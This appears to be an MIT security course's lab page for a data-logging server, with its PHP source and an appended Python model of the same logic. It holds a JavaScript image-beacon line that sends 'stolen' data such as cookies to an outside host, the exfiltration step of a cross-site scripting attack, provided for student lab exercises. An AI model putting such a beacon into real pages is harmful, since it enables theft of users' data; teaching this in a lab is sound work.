Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)

ID: (some identifier to locate your payload in the log)
Payload: (the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:


Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if ($payload === '') {  // empty() would also reject the literal payload "0"
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    // replace CR/LF with '.' so a single request cannot forge extra log lines
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $line = fgets($file);
        if ($line === false) {
            break;  // fgets() returns false once the last line has been consumed
        }
        $lines[] = $line;
    }
    ftruncate($file, 0);
    rewind($file);
    // newest entry first, followed by at most 100 older lines
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as $line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input id="id" name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input id="payload" name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
        </form>

        <h2>Logged entries</h2>
        <p>
            Below are the most recent logged entries, so that you can check
            if your attack worked:
        </p>

        <pre class="tty"><?php
            // the file holds user-controlled text; escaping it keeps the log
            // viewer itself from becoming an XSS sink
            $path = "/tmp/6.566-2024-logger.txt";
            $lines = is_readable($path) ? file_get_contents($path) : "";
            echo htmlspecialchars($lines);
        ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>
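The server-side logic of log.php above, re-expressed in Python as an added example (the lab's own code is the PHP file itself). `LogServer`, its `handle` method, the injectable clock and the constructed ids and payloads are my names and data; the APCu key store and the log file are replaced by in-memory structures so it runs offline.

```python
import time
from email.utils import formatdate

MAX_LEN = 1000       # byte limit log.php applies to both id and payload (strlen)
DEDUP_SECONDS = 5    # apcu_add() TTL: an identical payload is refused inside this window
MAX_OLD_LINES = 100  # older lines re-read before the new entry is written first


class LogServer:
    """Model of log.php's request handling (constructed example, not the lab's code)."""

    def __init__(self, clock=time.time):
        self.clock = clock   # injectable so the dedup window can be tested deterministically
        self.recent = {}     # payload -> expiry time, standing in for the APCu key store
        self.lines = []      # log file contents, newest entry first

    def handle(self, params, now=None):
        """Return (status, body) as the PHP does; 200/'Logged!' means the entry was stored."""
        now = self.clock() if now is None else now
        if "id" not in params:
            return 200, "<html form>"   # PHP leaves the do/while and renders the page
        ident = params["id"]
        if len(ident.encode()) > MAX_LEN:
            return 413, "ID value is larger than 1000 bytes"
        if "payload" not in params:
            return 400, "No payload given"
        payload = params["payload"]
        if payload == "":
            return 400, "Empty payload given"
        if len(payload.encode()) > MAX_LEN:
            return 413, "Payload is larger than 1000 bytes"
        # apcu_add() semantics: the add succeeds only if the key is absent or expired
        expiry = self.recent.get(payload)
        if expiry is not None and expiry > now:
            return 429, "That exact payload was sent very recently; rejecting"
        self.recent[payload] = now + DEDUP_SECONDS
        # CR and LF become '.', so a request cannot forge additional log lines
        ident = ident.replace("\n", ".").replace("\r", ".")
        payload = payload.replace("\n", ".").replace("\r", ".")
        stamp = formatdate(now)     # RFC 2822 timestamp, like date(DATE_RFC2822)
        entry = f"{stamp}: {ident}: {payload}"
        # rotation: newest first, then at most MAX_OLD_LINES of the previous file
        self.lines = [entry] + self.lines[:MAX_OLD_LINES]
        return 200, "Logged!"
```

The 429 branch shows why two students who send the same cookie value within five seconds see a rejection: deduplication keys on the payload alone, not on the id.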